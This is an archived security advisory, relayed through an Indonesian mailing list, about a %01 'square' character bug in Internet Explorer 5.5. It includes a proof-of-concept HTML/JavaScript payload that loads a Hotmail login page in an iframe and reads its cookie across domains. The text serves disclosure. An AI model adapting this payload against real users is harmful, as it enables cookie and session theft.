Internet Explorer "square" security hole ------------------------------------------------------------------------ SUMMARY When a 'square' (an undisplayable character, which is equal to the 1st character in the ASCII table) is inserted in some strategic position in a JavaScript code, it is possible to access to local files, the IFRAMES DOM, cookies from other domains and more. DETAILS Vulnerable systems: Microsoft Internet Explorer version 5.5 The original <http://www.securiteam.com/exploits/Internet_Explorer_5_0___01_security_bug__found__new_.html> "%01" bug was discovered by Georgi Guninski. The bug affected various versions of IE and was patched later. It involved the usage of %01 to cause scripts to be executed, even when they should not. The following code is an example to a new attack that is very similar to the previous one. The code will access cookies of any domain: (Before testing this code replace '!' with 'i' in the script tag) <OBJECT classid="clsid:AE24FDAE-03C6-11D1-8B76- 0080C744F389" width="1024" height="500"> <PARAM NAME="URL" value="about:<iframe id=box src='http://lc2.law5.hotmail.passport.com/cgi- bin/login' width='800' ></iframe><scr!pt>setTimeout ('alert(\'your cookie from hotmail \'+box.document.cookie)',10000) </scr! pt> http://lc2.law5.hotmail.passport.com/cgi- bin/login"> </OBJECT> Additional demonstrations can be found at <http://horoznet.com/AlpSinan> http://horoznet.com/AlpSinan. -- Eko Sulistiono MIKRODATA & AntiVirus Media Web: http://www.mikrodata.co.id/ WAP: http://www.mikrodata.co.id/wap/index.wml This message contains no viruses. Guaranteed by AVP. ------------------------------------------------------------------------ Forum Komunikasi Penulis-Pembaca MIKRODATA (FKPPM) Informasi : http:[EMAIL PROTECTED] Arsip : http://www.mail-archive.com/forum%40mikrodata.co.id/ WAP : http://mikrodata.co.id/wap/index.wml Milis ini menjadi kontribusi beberapa rubrik yang diasuh tim MIKRODATA. Termasuk rubrik-rubrik yang ada di media lain. Memakai, Menyebarluaskan, dan Memperbanyak software bajakan adalah tindakan kriminal. Please check with the latest AVP update before you ask about virus: ftp://mikrodata.co.id/avirus_&_security/AntiViral_Toolkit_Pro/avp30.zip
